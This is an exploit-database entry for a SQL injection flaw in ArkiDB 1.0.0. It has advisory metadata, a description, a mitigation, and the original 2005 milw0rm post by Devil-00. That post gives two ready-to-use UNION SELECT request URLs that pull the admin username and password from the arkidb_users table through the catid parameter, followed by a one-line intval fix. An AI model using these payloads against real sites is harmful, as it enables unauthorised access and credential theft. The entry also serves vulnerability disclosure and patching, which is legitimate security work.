ArkiDB SQL Injection's - exploit.company

vendor:

ArkiDB

by:

Devil-00

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: ArkiDB

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

ArkiDB SQL Injection’s

ArkiDB is prone to a remote SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to manipulate SQL queries in the context of the affected application, allowing for the manipulation or disclosure of arbitrary data. This issue affects ArkiDB version 1.0.0.

Mitigation:

The application should sanitize user-supplied data before using it in an SQL query.

Source

Exploit-DB raw data:

[~] ArkiDB SQL Injection's [~]
[~] ArkiDB (catid) Ramote SQL Injection's 
[~] ---------------------- [~]
[~] Bug By Devil-00
[~] devil-00@s4a.cc
[~] 
[~] Whe Ar All Love Security4Arab For Ever [ S4a.cc ]
[~] -------------------------------------------------
[~]
[~] Explorer Exploit By  Devil-00
[~] -------------------------------------------------
[~] Greetz :-
[~]   Devil-00
[~]   www.s4a.cc << We Love You
[~]   www.securitygurus.net << Love you 2 :P
[~]   HACKERS PAL - ABDUCTER - Xion - Yes2Hack - Ja7ole - Magode .. All S4a And SG Members
[~]---------------------------------------------------------------------------------------------------------
[~] Explorer Exploit :-
[~]
[~]  [Username]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,username,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1    
[~]
[~]  [Password]
[~] /index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,userpass,null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
[~]----------------------------------------------------------------------------------------------------------
[~] FIX :-
[~]  Line 75 .. File /source/view.php
[~]  
[~]   $catid = $this->get('catid');
[~] Change To
[~]   $catid = intval($this->get('catid'));
[~]---------------------------------------------------------------------------------------------------------- 

[~] milw0rm.com [2005-11-14]